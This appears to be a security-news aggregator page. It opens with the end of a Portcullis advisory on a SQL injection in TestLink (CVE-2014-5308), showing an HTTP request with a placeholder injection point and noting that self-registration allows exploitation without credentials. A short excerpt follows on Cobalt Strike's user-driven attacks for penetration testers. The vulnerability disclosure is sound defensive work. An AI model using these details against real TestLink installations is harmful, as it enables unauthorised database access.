Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0
DNT: 1
Connection: close
Referer: http://192.168.56.101/testlink/lib/events/eventviewer.php
Pragma: no-cache
Cache-Control: no-cache
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cookie: [...] ys-edit_tc_tproject_id_1_ext-comp-1001=a%3As%253A/1; ys-tl_table_eventviewer={"columns":[{"id":1,"width":217,"hidden":true,"sortable":true}],"sort":{"field":"id_th_timestamp","direction":"DESC"},"group":"id_th_loglevel","filters":{}}

id=123<SQL Injection>

</pre>

Note:'Any user can create account for the application in 'testlink/firstLogin.php' page hence its possible to exploit aforementioned SQL injections without prior knowledge of the authentication details.'

Further details at:

https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-5308/


Copyright:
Copyright (c) Portcullis Computer Security Limited 2014, All rights reserved worldwide. Permission is hereby granted for the electronic redistribution of this information. It is not to be edited or altered in any way without the express written consent of Portcullis Computer Security Limited.

Disclaimer:
The information herein contained may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk. In no event shall the author/distributor (Portcullis Computer Security Limited) be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information.


###############################################################
This email originates from the systems of Portcullis
Computer Security Limited, a Private limited company,
registered in England in accordance with the Companies
Act under number 02763799. The registered office
address of Portcullis Computer Security Limited is:
Portcullis House, 2 Century Court, Tolpits Lane, Watford,
United Kingdom, WD18 9RS.
The information in this email is confidential and may be
legally privileged. It is intended solely for the addressee.
Any opinions expressed are those of the individual and
do not represent the opinion of the organisation. Access
to this email by persons other than the intended recipient
is strictly prohibited.
If you are not the intended recipient, any disclosure,
copying, distribution or other action taken or omitted to be
taken in reliance on it, is prohibited and may be unlawful.
When addressed to our clients any opinions or advice
contained in this email is subject to the terms and
conditions expressed in the applicable Portcullis Computer
Security Limited terms of business.
###############################################################

#####################################################################################
This e-mail message has been scanned for Viruses and Content and cleared
by MailMarshal.
#####################################################################################

User-driven Attacks

October 1, 2014, 12:10 pm
$
0
0
A user-driven attack is an attack that relies on a feature to get code execution. Most penetration testers I know rely on user-driven attacks over public memory corruption exploits. User-driven attacks are less likely to see a patch and they usually target an application in a way that works across many versions. What’s not to like?

Cobalt Strike offers several user-driven attacks. In this post, I’ll give you a quick tour of what’s available. These are my options to help you get a foothold.


more here.........http://blog.cobaltstrike.com/2014/10/01/user-driven-attacks/
Viewing all 8064 articles
Browse latest View live
Search